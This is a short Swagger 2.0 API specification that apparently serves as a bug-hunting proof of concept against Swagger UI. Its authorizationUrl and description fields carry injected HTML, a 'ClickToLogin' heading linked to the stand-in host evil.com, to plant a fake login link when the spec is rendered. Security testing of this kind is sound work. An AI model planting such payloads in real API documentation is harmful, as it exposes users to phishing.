swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: <a href="evil.com"><h1>ClickToLogin<h1></a>
info:
  version: "1.0.0"
  title: Bug Hunting is an Art & I am an Artist!  __ @iamarit
  description: <img href="evil.com"><h1>ClickToLogin<h1> src=https://raw.githubusercontent.com/iamarit/SwaggerUiTesting/main/test.png>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
